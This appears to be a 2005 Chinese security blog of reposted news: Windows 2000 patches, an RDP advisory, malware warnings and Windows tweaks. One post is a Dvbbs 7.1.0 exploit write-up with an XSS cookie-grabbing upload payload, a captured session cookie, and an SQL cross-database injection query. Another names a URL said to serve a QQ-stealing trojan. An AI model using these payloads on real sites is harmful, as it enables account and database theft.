2005年06月30日

微软今天终于推出了传说中Windows 2000系统最后一个补丁,代号为891861的Update Rollup 1 for Windows 2000 SP4(累计补丁,人们所说的SP5)即日起开始在微软主页上提供下载,微软已发布相关安全公告。  

  Update Rollup 1是一个包括了Hotfix,安全补丁和关键更新在内的累积性补丁,将提高Win2000的易用性。  

  作为累积补丁,Update Rollup包括Windows 2000 SP4发布以来的所有安全更新,同时它还具有一些重要的非安全方面的更新。也就是说,无论你用何版本Windows 2000,只要安装 Windows 2000 Update Rollup,你就拥有了Windows 2000“从古至今”所有的补丁了,不会遗漏,也再没有新的了,就像一个十全补丁。  

简体中文版下载:
http://download.microsoft.com/download/a/5/d/a5d03b5f-576b-43ce-8f3c-e648c37272ee/Windows2000-KB891861-x86-CHS.EXE

2005年06月29日

文章作者:LiNZI[B.C.T]@www.cnbct.org
信息来源:邪恶八进制信息安全团队

厂商名字:动网先锋论谈
厂商地址:http://www.dvbbs.net/
漏洞程序:Dvbbs 7.1.0
漏洞描述:
Dvbbs 7.1.0 的Cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现SQL跨库查询等。
漏洞利用例子:
一、泄露绝对漏洞测试:
对官方的测试站点:bbs.dvbbs.net
上传一张图,代码如下:
GIF89a
<script>alert(document.cookie)</script>
抓包得到cookie如下
Cookie: ASPSESSIONIDSSDSCBQD=NHANOBNCAPCPAMCFMAGDIJCB; dwebdvbbs7%2E1%2E0=UserID=617054&usercookies=1&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzibct&password=t8ob621664s5v6HL&userhidden=2&StatUserID=2189992004; Dvbbs=
分析cookie可以得到站点的绝对路径如下:
d:\\web\\dvbbs7为论谈的绝对路径
二、攻击延伸:
www.host.com
主程序存在sql注入漏洞,但是找不到表名和字段名。
注入点假设:
www.host.com\\linzi.asp?fuck=you
论谈为dvbbs 7.1.0 ,数据库为data\\\\dvbbs.asp,做了防下载处理.
利用上面的动网暴路径,抓包得到绝对路径为 d:\\www\\dvbbs\\data\\dvbbs.asp
实现跨库查询如下:
www.host.com\\linzi.asp?fuck=you and (select count(*) from dv_admin in "d:\\www\\dvbbs\\data\\dvbbs.asp")
官方补丁:
尚无

6月29日消息微软周二发布了预计将成为Windows 2000操作系统的最后一个主要的补丁程序——Update Rollup。

  微软此前称将它将在本月底起对已推出5年之久的Windows 2000操作系统常规支持该为后续支持。一般情况下,微软不会对提供后续支持的产品增加新的功能,而Update Rollup也只是对此前所发布的补丁的汇总,缺乏新的功能。

  微软曾在去年11月份表示它将发布一个集成版的Update Rollup而不是SP 5服务包。这下,Windows 2000最后服务包变成了早在2003年3月就已出笼的SP4。

  据市场调研公司AssetMetrix最近发布的一份调查报告指出,虽然微软在Windows 2000之后已推出了好几个其它的Windows版本,但Windows 2000在企业中应用依然很活跃——它几乎还占有基于Windows的企业台式电脑的半壁江山。
 
 【转自世纪安全网 http://www.21safe.com】
2005年06月22日

早上开了邮箱,发现了

iceboy82,您好:

  感谢您在 2005年06月21日 16:28 申请注册 VeryCD 的论坛帐号。
  恭喜您,您的申请已经审核通过,这是给您的注册序列号:56C0D3038383A0EB
  您也可以将以下地址直接复制到浏览器的地址栏内:http://bbs.verycd.com/forum/index.php?act=Reg&CODE=00&reg_key=56C0D3038383A0EB

  感谢您对于 VeryCD 的热心支持:)

VeryCD 团队
敬上
http://www.VeryCD.com

吼吼,终于成功了,这是偶的第三次申请,看来事不过三还是有些道理的啊!

说说心得吧!

首先要说明自己希望加入VeryCD的强烈愿望,

其次可以具体说说自己加入的目的,

最后要发扬P2P2的核心精神,努力为论坛的发展做贡献,我为人人,人人为我。

希望大家都能申请到序列号。

2005年06月21日
1、如果你有donews.com的账号,如果你有donews.net的账号,如果你有365key.com的账号,那么,你可以立即上mail.donews.com,激活自己的同名ID的donews邮箱。先到先得。

2、本邮箱是donews和雅虎合作。后台使用雅虎的系统,稳定可靠。

3、安全无毒 – 全部邮箱提供免费防病毒(Norton)功能
 防垃圾信 – 专利反垃圾邮件技术,有效防御95%以上的垃圾邮件
 超大空间 – 1000M空间,10M附件
 空间增值 – 30兆网络相册和30兆网络公文包

问题咨询到iceboy82@donews.com

2005年06月07日

我们知道Windows 2000专业版或Windows XP专业版操作系统中IIS最多允许10个客户端的连接,在Windows 2000服务器版或Windows 2003服务器版操作系统中则不存在这种连接限制问题。

  Microsoft提供了一个管理IIS的小工具MetaEdit,MetaEdit工作在Windows NT4.0 Windows 2000上,我发现它在Windows XP上也能正常工作,另外,MetaEdit只能管理II4.0、IIS5.0或更高版本的IIS。

  下面教你如何利用这个工具突破Windows XP专业版IIS客户端连接限制:

  首先,你需要到下面的地址下载MetaEdit,最新版本是2.2。然后执行MtaEdt22.exe按向导提示完成安装。最后,在 MetaEdit中设置客户端连接限制的参数。安装MetaEdit完毕后,在开始菜单的程序组Administrative Tools下点击MetaEdit 2.2运行,出现窗口:

在窗口的左边将树展开至LM W3SVC,直接在W3SVC文件夹上单击,选择右边列表中Name为MaxConnections的项,双击后,出现对话框:

在最后Data的文本框中默认的是10,这就是Windows XP专业版IIS默认设置的最大客户端连接数了,现在你可以改变这个默认值了,我把它改为10000,注意:在Win2000 上的IIS客户端连接数最大为2000000000。

  关于这个工具我还未对Windows2000和Windows NT4下的IIS做过测试,有兴趣的朋友可以按上面的方法试一下。


                     :下载MetaEdit 2.2

【转自世纪安全网 http://www.21safe.com】

软件介绍:3721上网助手是一个常见的浏览器插件,它可以保护我们的电脑不受恶意网站的侵害,并有一定的系统和IE修复能力,在很多时候还是可以帮上我们不少忙的。不过有的朋友是在无意中安装3721的,一旦3721进入了你的电脑之后,就很难将它完全从系统中卸载干净,而且3721也没有提供一个完全的反安装程序,对此不少网络用户颇有微词。

一、下载UPIEA(IE插件屏蔽) 2005 1.30b

点击浏览该文件
二、运行“UPIEA”,选“插件状态”~~~“本地插件”~~~“上网助手”,旁边会出现“卸载”,
点击“卸载”,如图“



此主题相关图片如下:

然后一路确定就好,最后会提示“卸载成功”如图:



此主题相关图片如下:

三、关机重启,进入
C:/Program Files/3721,删除3721文件夹

四、运行“UPIEA”,选“插件免疫”~~~“国内”~~~把所有有关3721的插件打上勾,进行免疫,最后按“应用”

【转自世纪安全网 http://www.21safe.com

本BLOG提供UPIEA(IE插件屏蔽) 下载地址,请查看左侧“软件下载”菜单。

2005年06月02日

里面 IFRAME了一个网页

指向的是下面的页面

http://www.chidanna.com/bbs/images/post/mm.htm

请各位 小心安全 不要随意打开这个页面。如果想研究请下载后查看源代码。

好像是一个偷QQ的木马,据说可能是灰鸽子。

程序是插入IE进程的。不会单独生成进程。

各位小心哦。不知道是不是被别人放的。还是。。

感谢 一叶梦舟

【转自世纪安全网 http://www.21safe.com

来源:绿盟科技

发布日期:2005-06-01

受影响系统:
Microsoft RDP 5.2
Microsoft RDP 5.1
Microsoft RDP 5.0
Microsoft RDP 4.0
描述:
——————————————————————————–
BUGTRAQ  ID: 13818

Microsoft Windows远程桌面协议(RDP)服务允许客户端访问MS的终端服务。

Microsoft Windows远程桌面协议的实现在处理密钥的交换时存在漏洞,远程攻击者可能利用此漏洞窃取服务器的加密密钥。

起因是尽管通过网络传输的信息已经过加密,但在建立会话的加密密钥时没有核实服务器的身份,导致攻击者可以获得密钥,计算出有效的签名,然后发动中间人攻击。成功利用这个漏洞的攻击者可以完全控制连接在服务器上的客户端。

<*来源:Massimiliano Montoro (mao@oxid.it)
  
  链接:http://www.oxid.it/downloads/rdp-gbu.pdf
*>

建议:
——————————————————————————–
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* Windows XP和Windows Server 2003用户使用FIPS(3des)加密;Windows Server 2003用户还可以使用SSH for RDP。

厂商补丁:

Microsoft
———
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/

2005年06月01日

该病毒自动通过QQ群传播。如果你下载并运行了该程序,就会自动往你所加入的群里传传入如下文件。

刷三钻.exe
刷QQ会员.exe
刷QQ等级.exe
劲舞团刷钱外挂.exe
劲乐团刷钱外挂.exe
QQ自定义功能.exe

等文件 。并可能有适当的删减和增加。这些文件大小都是24.73KB。该病毒可能会传播很快,请各位好友注意防范。不要轻易下载群里面的文件。

 

在自动传好文件并可能会在群里发消息如下:群里有好东西下载啊,,大家快去下啊..

各位要注册防范。小心中毒 ,最近通过IM工具传播的病毒是越来越多了,大家小心中招。